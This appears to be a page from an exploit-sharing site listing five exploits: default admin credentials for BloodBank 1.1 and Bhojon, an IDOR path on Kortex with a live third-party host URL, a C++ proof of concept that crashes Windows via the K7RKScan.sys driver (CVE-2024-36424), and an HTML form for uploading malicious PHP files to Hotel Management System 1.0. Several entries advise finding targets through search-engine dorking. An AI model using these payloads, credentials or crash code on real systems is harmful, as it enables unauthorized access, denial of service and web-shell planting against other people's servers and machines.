Latest exploits :: CodePwn

<pre><code>==================================================================================================================================== | # Title : BloodBank 1.1 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://demo.phpscriptpoint.com/bloodbank/ | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@gmail.com & pass = 1234 [+] https://www/127.0.0.1/demo/phpscriptpointcom/bloodbank/admin Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>

<pre><code>==================================================================================================================================== | # Title : Bhojon restaurant management system v2.9 Insecure Settings Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.bdtask.com/restaurant-management-system.php#live_demo | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Settings : appears to leave a default administrative account in place post installation. [+] use payload : user = admin@example.com & pass = 12345 [+] https://www/127.0.0.1/somrestocom/dashboard/ Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code># Title: K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference # Date: 13.08.2024 # Author: M. Akil Gündoğan # Vendor Homepage: https://k7computing.com/ # Version: < v17.0.2019 # Tested on: Windows 10 Pro x64 # CVE ID: CVE-2024-36424 # Vulnerability Description: -------------------------------------- In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group. # Technical details and step by step Proof of Concept's (PoC): -------------------------------------- 1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create. 2 - Compile the attached PoC code written in C++ as release on VS 2022. 3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD. # Impact: -------------------------------------- An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system. # Advisories: -------------------------------------- K7 Computing recommends that all customers update their products to the corresponding versions shown below: K7 Ultimate Security (17.0.2019 or Higher) # Timeline: -------------------------------------- - 16.05.2024 - Vulnerability reported. - 05.08.2024 - Vendor has fixed the vulnerability. - 13.08.2024 - Released. # References: -------------------------------------- - Vendor: https://www.k7computing.com - Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417 - CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424 - Repository: https://github.com/secunnix/CVE-2024-36424 # PoC Code (C++): ------------------------------------------------------------------------------------------------------------------------- /* # Usage: Only compile it and run, boooom :) */ #include <windows.h> #include <iostream> const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014 int main() { std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl; HANDLE hDevice = CreateFile(driverDevice.c_str(), GENERIC_READ | GENERIC_WRITE, 0, nullptr, OPEN_EXISTING, 0, nullptr); if (hDevice == INVALID_HANDLE_VALUE) { std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl; return 1; } void* inputBuffer = nullptr; // Null input buffer DWORD inputBufferSize = 0; DWORD bytesReturned; BOOL result = DeviceIoControl(hDevice, ioCTL, inputBuffer, inputBufferSize, nullptr, 0, &bytesReturned, nullptr); if (!result) { std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl; } CloseHandle(hDevice); return 0; } </code></pre>

<pre><code>==================================================================================================================================== | # Title : Kortex v1.0 IDOR Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 125.0.1 (64 bits) | | # Vendor : https://www.mayurik.com/source-code/P5339/best-free-law-office-management-software | ==================================================================================================================================== poc : [+] Dorking İn Google Or Other Search Enggine. [+] Insecure Direct Object Reference : suffers from an insecure direct object reference that allows users to access the administrative interface. [+] use payload : /control/data-table.php [+] https://www/ahmedshawki2110.freewebhostmost.com/control/data-table.php Greetings to :================================================== jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R | ================================================================ </code></pre>

<pre><code>============================================================================================================================================= | # Title : Hotel Management System 1.0 Remote File Upload Vulnerability | | # Author : indoushka | | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 128.0.3 (64 bits) | | # Vendor : https://www.sourcecodester.com/sites/default/files/download/oretnom23/hotel-management-system-using-php.zip | ============================================================================================================================================= poc : [+] Dorking İn Google Or Other Search Enggine. [+] This HTML page is designed to remotely upload malicious PHP files directly. [+] Line 23 set url of target. [+] The path to upload the files : http://127.0.0.1/hotel/assets/img/ [+] Save Code as html : <!DOCTYPE html> <html lang="en"> <head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title>Category Management</title> </head> <body> <div class="container-fluid"> <form id="manage-category" enctype="multipart/form-data"> <input type="hidden" name="id"> <div class="form-group"> <label for="img" class="control-label">Ev!L Image</label> <input type="file" name="img" id="img" class="form-control form-control-sm rounded-0" accept="image/*" onchange="displayImg(this, $(this))"> </div> <button type="submit" class="btn btn-primary">Send</button> </form> </div> </tbody> </table> </div> <script src="https://code.jquery.com/jquery-3.6.0.min.js"></script> <script> function displayImg(input, _this) { if (input.files && input.files[0]) { var reader = new FileReader(); reader.onload = function (e) { $('#cimg').attr('src', e.target.result); } reader.readAsDataURL(input.files[0]); } } $('#manage-category').submit(function(e){ e.preventDefault(); $.ajax({ url: 'http://127.0.0.1/hotel/admin/ajax.php?action=save_category', data: new FormData($(this)[0]), cache: false, contentType: false, processData: false, method: 'POST', type: 'POST', success: function(resp){ if (resp == 1) { alert("Data successfully added"); setTimeout(function(){ location.reload(); }, 1500); } } }); }); $('.edit_cat').click(function(){ var cat = $('#manage-category'); cat.get(0).reset(); $('#cimg').attr('src', '../assets/img/' + $(this).attr('data-cover_img')); }); </script> </body> </html> Greetings to :============================================================ jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * CraCkEr | ========================================================================== </code></pre>